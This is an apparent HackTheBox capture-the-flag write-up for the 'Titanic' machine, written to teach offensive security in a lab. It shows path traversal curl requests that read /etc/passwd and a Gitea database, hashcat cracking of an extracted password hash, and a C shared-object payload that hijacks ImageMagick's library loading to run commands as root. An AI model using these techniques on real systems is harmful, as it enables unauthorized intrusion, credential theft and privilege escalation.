HackTheBox: Titanic
Overview
Titanic is a Linux machine that requires exploiting a Local File Inclusion (LFI) vulnerability to extract sensitive internal databases. After cracking hashes from a Gitea instance to gain SSH access, privilege escalation is achieved by exploiting an ImageMagick execution vulnerability via a malicious C shared object.
Initial Access: Local File Inclusion
Intercepting web traffic reveals a file download endpoint using a ticket parameter. The endpoint is vulnerable to directory traversal.
curl 'http://titanic.htb/download?ticket=../../../../../etc/passwd'
Reviewing the /etc/passwd file reveals a developer user. We can successfully extract the user flag directly through the LFI:
curl 'http://titanic.htb/download?ticket=../../../../../home/developer/user.txt'
Enumerating Subdomains
Subdomain enumeration via ffuf (or directly extracting /etc/hosts via the LFI) uncovers the dev.titanic.htb subdomain.
curl 'http://titanic.htb/download?ticket=../../../../../etc/hosts'
# Output reveals dev.titanic.htb
Running Nmap against the dev subdomain shows a Gitea instance.
Extracting Gitea Credentials
Using the LFI, we extract the Gitea database and configuration file from the default installation paths:
curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/gitea.db' --output gitea.db
The database contains user hashes. Using gitea2hashcat.py, we convert the SQLite database entries into Hashcat-compatible formats:
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:[REDACTED]
Cracking the Hash
The hash utilizes PBKDF2-HMAC-SHA256 (mode 10900) with 50,000 iterations. We crack it using Hashcat:
hashcat -m 10900 --force developer.hash /usr/share/wordlists/rockyou.txt
The password cracks successfully to [REDACTED]. Using this, we SSH into the machine as developer.
Privilege Escalation: ImageMagick Hijacking
In the developer user's home directory, there is a script operating on images located in /opt/app/static/assets/images/. The script utilizes find combined with xargs to process images with magick identify.
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify
This specific version of ImageMagick is vulnerable to arbitrary code execution (GHSA-8rxc-922v-phg8). By dropping a malicious shared object library named libxcb.so.1 in the working directory, we can hijack the execution flow when magick attempts to load dependencies.
Crafting the Payload
We write a C script that defines an initialization function to execute system commands:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/root.txt");
exit(0);
}
We compile it into a shared object using gcc:
gcc -x c -shared -fPIC -o ./libxcb.so.1 revshell.c
mv libxcb.so.1 /opt/app/static/assets/images/
We then create a dummy .jpg file in the directory. When the automated task runs magick identify on the image, the malicious libxcb.so.1 library is loaded, executing our code as root and dumping the root flag to /tmp/root.txt.